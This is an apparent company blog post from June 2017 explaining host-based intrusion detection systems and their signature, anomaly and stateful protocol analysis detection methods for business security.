With cyber attacks and hacking all over the news, building up your own company’s security may be on your mind. We know today that a firewall is not enough and should not be the only tool we rely on for security. We have transitioned into an age where we are able to take steps to secure our IT infrastructure from malware with a multi-layered front. An Intrusion Detection System (IDS) is an application that monitors a network or system for suspicious activity and is typically paired with a firewall for additional protection. One type of IDS is a Host-based Intrusion Detection System (HIDS). HIDS is a very versatile form of IDS.
As the name suggests, HIDS resides in a single host system monitoring and reporting on the system’s configuration and application activity. This added layer of protection ensures anything that gets past your firewall does not leave you vulnerable. HIDS has multiple facets, such as signature detection, anomaly detection, and stateful protocol analysis detection to protect you against malicious threats. Evaluating the above facets may help in deciding if HIDS fits within an organization.
One of the different methods HIDS uses is signature detection. Also known as pattern matching or misuse detection, it’s used to detect known attacks by the specific actions they perform. The specific actions are known as signatures, hence the name. This method must be kept up to date for optimal results, as it looks for traffic and behavior that matches the signatures of known attacks. Signature detection also has a low false positive rate as well as a high true positive rate for known attacks.
The second method of HIDS is known as anomaly detection or statistical detection. With this method, you’ll need to establish a baseline of what are normal usage patterns within your system. By doing so, anything that widely deviates from the norm is flagged as a possible intrusion. Anomaly detections can investigate user patterns as well. For example, if someone working in one department begins to access files not pertaining to them, it can alert administrators. Anomaly detection is the barrier that allows you to catch new intrusions that have not yet been implemented as signatures. It can be used for multiple business reasons. According to Datalya, anomalies in business can be categorized as such:
1. Point anomalies
A single instance of data is anomalous if it’s too far off from the rest.
2. Contextual anomalies
The abnormality is context specific. This type of anomaly is common in time-series data.
3. Collective anomalies
A set of data instances collectively helps in detecting anomalies.
Anomaly detection does have a higher chance of false positives, but when paired with signature detection, can result in a powerful defense.
Stateful Protocol Analysis Detection
Identifying deviations of protocol state (much like anomaly-based) is the stateful protocol method of HIDS. It differs from anomaly detection as it uses predetermined universal profiles based on what a company has developed as accepted definitions of benign activity. It must be created based on the standards or specifications a vendor implements and cannot have too many variations in standards, otherwise, it can cause difficulties in the system to detect and analyze the states. It is able to then identify an unexpected sequence of commands and has the capability to keep track of said profiles in both a network layer and application layers.
Seeing the many features of a host-based IDS provides you with the intel on not only how it works, but how it can work within your business. Pairing with a firewall and utilizing the methods it has to offer, HIDS is a great addition to protecting your company from malicious or anomalous activity within the host system.
June 27, 2017